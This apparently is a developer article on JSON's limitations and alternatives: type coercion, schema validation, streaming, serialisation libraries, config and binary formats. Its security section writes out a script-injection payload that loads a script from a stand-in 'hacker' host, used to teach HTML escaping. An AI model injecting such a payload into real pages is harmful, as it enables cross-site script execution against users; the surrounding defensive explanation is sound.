All things about JSON.
Beginning
JSON was born out of a web platform limitation and a bit of creativity. XMLHttpRequest made it possible to talk to the server without a full page reload, but XML is "heavy" on the wire, so Douglas Crockford came up with a clever trick: use JavaScript Object Notation and eval to pass data from the server to the client (or vice versa) in an easy way. But it is not safe to execute arbitrary code (eval), especially if it comes from a third-party source, so the next step was to standardize the format and implement a dedicated parser for it. Later it became a standard across browsers, and now we can use it as JSON.parse.
Limitations
Taking into account how it was born, it comes with some limitations.
Asymmetric encoding/decoding
You know how JS tries to pretend that type errors don't exist and just coerces values at any cost, even when it doesn't make much sense? JSON.stringify behaves the same way: it silently coerces values it cannot represent, so x == JSON.parse(JSON.stringify(x)) doesn't always hold true. For example:
- Date will be turned into its string representation, and after decoding it will stay a string
- Map, WeakMap, Set, WeakSet will be turned into "{}" - they lose both contents and type
- BigInt, for a change, throws TypeError: Do not know how to serialize a BigInt
- a function will be converted to undefined
- undefined will stay undefined (and object properties with undefined values are dropped)
- ES6 class instances and new function(){} will be converted into a plain-object representation, but will lose their type
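A quick illustration of this asymmetry in plain JavaScript:
const original = { when: new Date(0), tags: new Set(["a", "b"]) };
const roundTripped = JSON.parse(JSON.stringify(original));
// { when: "1970-01-01T00:00:00.000Z", tags: {} }
// the Date became a string, the Set lost both its type and its contents
console.log(roundTripped);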
Solution: one possible solution here is to use a static type system, like TypeScript or Flow, to prevent asymmetric types:
// inspired by https://github.com/tildeio/ts-std/blob/master/src/json.ts
export type JSONValue =
  | string
  | number
  | boolean
  | null
  | JSONObject
  | JSONArray;
type JSONObject = { [key: string]: JSONValue };
type JSONArray = Array<JSONValue>;

export const symmetricStringify = (x: JSONValue) => JSON.stringify(x);
Though it will not save us from TypeError: Converting circular structure to JSON; we will get to that later.
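A small sketch of what this buys us (using the JSONValue type and symmetricStringify helper defined above; the variables are made up for illustration):
const user = { name: "Ann", createdAt: new Date() };
// symmetricStringify(user);
// ^ compile-time error: Date is not assignable to JSONValue

const cyclic: Record<string, JSONValue> = {};
cyclic.self = cyclic; // perfectly fine for the type system...
// JSON.stringify(cyclic); // ...but at runtime: TypeError: Converting circular structure to JSON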
Security: script injection
If you use JSON as a way to pass data from the server to the client inside HTML (for example, the initial value of a Redux store in the case of server-side rendering, or gon in Ruby), be aware that there is a risk of a script injection attack:
<script>
var data = {user_input: "</script><script src=http://hacker/script.js>"}
</script>
Solution: escape JSON before passing it to HTML
const UNSAFE_CHARS_REGEXP = /[<>\/\u2028\u2029]/g;
// Mapping of unsafe HTML and invalid JavaScript line terminator chars to their
// Unicode char counterparts which are safe to use in JavaScript strings.
const ESCAPED_CHARS = {
"<": "\\u003C",
">": "\\u003E",
"/": "\\u002F",
"\u2028": "\\u2028",
"\u2029": "\\u2029"
};
const escapeUnsafeChars = unsafeChar => ESCAPED_CHARS[unsafeChar];
const escape = str => str.replace(UNSAFE_CHARS_REGEXP, escapeUnsafeChars);
export const safeStringify = (x) => escape(JSON.stringify(x));
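For example, feeding the malicious input from above through safeStringify yields a string that the HTML parser can no longer interpret as a closing script tag:
const payload = safeStringify({ user_input: "</script><script src=http://hacker/script.js>" });
// '{"user_input":"\u003C\u002Fscript\u003E\u003Cscript src=http:\u002F\u002Fhacker\u002Fscript.js\u003E"}'
// the JS engine decodes \u003C back to "<" when it parses the inline script,
// so the data is unchanged, but the HTML parser never sees "</script>"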
Side note: collection of JSON implementation vulnerabilities
Lack of schema
JSON is schemaless - this makes sense because JS is dynamically typed. But it means that you need to verify the shape (the types) yourself; JSON.parse won't do it for you.
Solution: I wrote about this problem before - use IO validation
Side note: there are also other solutions, like JSON API, Swagger, and GraphQL.
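A minimal sketch of IO validation with io-ts (the v1 API, the same library as in the example below; the User shape is made up for illustration):
import * as t from 'io-ts'

const User = t.type({
  id: t.number,
  name: t.string
})

// decode returns an Either: a typed value on success, a list of errors on failure
User.decode(JSON.parse('{"id": 1, "name": "Ann"}')).isRight()   // true
User.decode(JSON.parse('{"id": "1", "name": "Ann"}')).isRight() // false - id is not a number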
Lack of schema and serializer/parser
Having a schema for the parser can solve the asymmetry issue for Date: if we know that we expect a Date at some place, we can use the string representation to create a JS Date out of it.
Having a schema for the serializer can solve the issue for BigInt, Map, WeakMap, Set, WeakSet, ES6 classes and new function(){}: we can provide a specific serializer/parser for each type.
import * as t from 'io-ts'

const DateFromString = new t.Type<Date, string>(
  'DateFromString',
  (m): m is Date => m instanceof Date,
  (m, c) =>
    t.string.validate(m, c).chain(s => {
      const d = new Date(s)
      return isNaN(d.getTime()) ? t.failure(s, c) : t.success(d)
    }),
  a => a.toISOString()
)
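Usage sketch - decoding turns the ISO string back into a real Date, encoding goes the other way:
DateFromString.decode('2019-01-01T00:00:00.000Z')           // right(Date)
DateFromString.decode('not a date')                         // left(errors)
DateFromString.encode(new Date('2019-01-01T00:00:00.000Z')) // '2019-01-01T00:00:00.000Z'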
Side note: see also this proposal
Lack of schema and performance
Having a schema can improve the performance of the parser. For example, see jitson and FAD.js
Side note: see also fast-json-stringify
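A rough sketch of the schema-driven approach with fast-json-stringify (API as described in the project's README; treat this as an illustration rather than a drop-in snippet):
const fastJson = require('fast-json-stringify')

// the schema tells the serializer exactly what to expect,
// so it can generate a specialized, faster stringify function
const stringify = fastJson({
  title: 'User',
  type: 'object',
  properties: {
    name: { type: 'string' },
    age: { type: 'integer' }
  }
})

stringify({ name: 'Ann', age: 30 }) // '{"name":"Ann","age":30}'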
Stream parser/serializer
When JSON was invented, nobody thought about using it for gigabytes of data. If you want to do something like this, take a look at a streaming parser.
Also, you can use a JSON stream to improve UX with a slow backend - see oboejs.
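For example, a sketch with the JSONStream package (the file name and the rows.* selector are made up; the parse call follows the package README):
const fs = require('fs')
const JSONStream = require('JSONStream')

// process a huge file item by item instead of loading it into memory at once
fs.createReadStream('huge.json')
  .pipe(JSONStream.parse('rows.*'))
  .on('data', row => console.log(row))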
Beyond JSON
uneval
If you want to serialize actual JS code and preserve types, references and cyclic structures, JSON will not be enough. You will need "uneval" (there is a small example after the lists below). Check out some of these:
- devalue
- lave
- js-stringify
- node-uneval
- node-tosource - Converts JavaScript objects to source
Other "variations to this tune":
- LJSON - JSON extended with pure functions
- serialize-javascript - Serialize JavaScript to a superset of JSON that includes regular expressions, dates and functions
- arson - Efficient encoder and decoder for arbitrary objects
- ResurrectJS preserves object behavior (prototypes) and reference circularity with a special JSON encoding
- serializr - Serialize and deserialize complex object graphs to and from JSON and Javascript classes
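For example, a sketch with serialize-javascript, one of the libraries listed above (the exact output format depends on the library version):
import serialize from 'serialize-javascript';

serialize({
  fn: function echo(arg) { return arg; },
  date: new Date(0),
  regexp: /json/gi
});
// produces JS source (not JSON!) that recreates the function, the Date and the RegExp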
As a configuration file
JSON was invented to transmit data, not to store configuration. Yet people use it for configuration because it is an easy option.
JSON lacks comments, requires quotes around keys, prohibits trailing commas at the end of arrays and objects, and requires paired {} and []. There is no real solution for this except to use another format, like JSON5, YAML or TOML.
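For example, everything in this snippet is invalid JSON but valid JSON5:
{
  // comments are allowed
  port: 8080,          // and so are unquoted keys
  hosts: [
    "example.com",
    "example.org",     // and trailing commas
  ],
}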
Binary data
JSON is more compact than XML, yet still not the most compact. Binary formats are even more efficient. Check out MessagePack.
Side note: GraphQL is not tied to JSON, so you can use MessagePack with GraphQL.
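A sketch with the @msgpack/msgpack package (the encode/decode API is assumed from its documentation):
import { encode, decode } from "@msgpack/msgpack";

const data = { id: 1, tags: ["a", "b"], active: true };
const packed = encode(data);      // Uint8Array, smaller than the equivalent JSON string
const unpacked = decode(packed);  // back to a plain JS object

console.log(JSON.stringify(data).length, packed.byteLength);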
Binary data and schema
Having a binary format with a schema allows some crazy optimizations, like random access or zero-copy. Check out Cap'n Proto.
Query language
JSON (like anything JS-related) is super popular, so people need to work with it more and more and have started to build tools around it, like JSONPath and jq.
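For example, a JSONPath query with the jsonpath npm package (the data shape and the query are made up; the jp.query call follows the package README):
const jp = require('jsonpath')

const data = { store: { books: [{ title: 'A' }, { title: 'B' }] } }
jp.query(data, '$..title') // ['A', 'B']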
Did I miss something?
Leave a comment if I missed something. Thanks for reading.